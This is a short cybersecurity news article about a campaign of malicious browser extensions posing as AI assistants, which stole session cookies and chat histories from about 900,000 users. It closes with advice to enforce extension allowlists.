MONDAY, MARCH 16, 2026
Follow us:
AI Security

Over 900,000 Users Tricked by Malicious Chromium Extensions Posing as AI Assistants

Over 900,000 Users Tricked by Malicious Chromium Extensions Posing as AI Assistants

Cybersecurity researchers have uncovered a massive, coordinated campaign utilizing malicious browser extensions that masquerade as helpful AI chatbots and productivity assistants. These extensions managed to bypass official web store security checks and amassed nearly 900,000 installations before being removed.

Deceptive Capabilities

The extensions were aggressively marketed as tools to integrate ChatGPT, Claude, and specialized generative AI writing features directly into the browser. While they did provide some basic chat capability (often proxying requests to legitimate APIs), their primary function was silent data harvesting.

Advertised Features

  • In-browser AI chat
  • Content summarization
  • Grammar correction

Hidden Malicious Actions

  • Stealing session cookies
  • Harvesting LLM chat history
  • Injecting affiliate links

The Threat to Enterprise Data

The most concerning aspect of this campaign is its targeting of LLM chat content. Employees frequently input sensitive corporate data, source code, and strategic documents into AI chatbots. These malicious extensions silently monitored the DOM and exfiltrated raw chat histories to external command-and-control servers.

Corporate Defense Recommendation Enterprises should strictly enforce browser extension allowlists through Group Policy or MDM solutions, explicitly banning unauthorized "AI assistant" plugins that request broad "read and change all your data on all websites" permissions.